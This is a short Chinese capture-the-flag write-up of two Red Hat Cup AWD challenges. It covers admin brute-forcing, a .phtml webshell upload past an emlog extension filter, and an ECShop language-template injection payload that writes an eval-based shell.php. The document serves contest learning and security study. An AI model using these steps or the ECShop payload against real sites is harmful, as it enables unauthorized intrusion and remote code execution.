紅帽杯線下AWD plus writeup

訪問是一個由emlog的博客站點。

直接訪問後台,得知存在admin用戶對admin進行暴力破解

上傳附件處限制了文件類型,發現可添加允許添加後綴名。嘗試了php,php5等類似添加後,都會被更改為x類型,最後嘗試添加phtml,成功添加。

然後直接去寫文章處添加附件,並上傳後綴為pthml的一句話

成功上傳後,右鍵附件複製鏈接地址,上菜刀,成功getshell。並在根目錄下找到flag

粵灣租賃

訪問web題目,系統為ecshopcms,發現兩個登錄處,一個是前台登陸,一個是後台登陸,前台登陸並未發現什麼可以拿下的點。

已知存在admin用戶,進行爆破

ecshop有已知的getshell方法,

直接在模板管理–語言項編輯直接修改來寫入shell文件;搜索關鍵字:用戶信息;用戶信息四個字一定不要刪除,在之後添加:(base64加密去掉了最後的=號)

1.${${fputs(fopen(base64_decode(c2hlbGwucGhw),w), base64_decode(PD9waHAgZXZhbCgkX1BPU1RbJ2gnXSk7Pz3))}}

而後保存,保存後訪問user.php即可在根目錄下生成shell.php的shell。然後上菜刀,成功在根目錄獲得flag。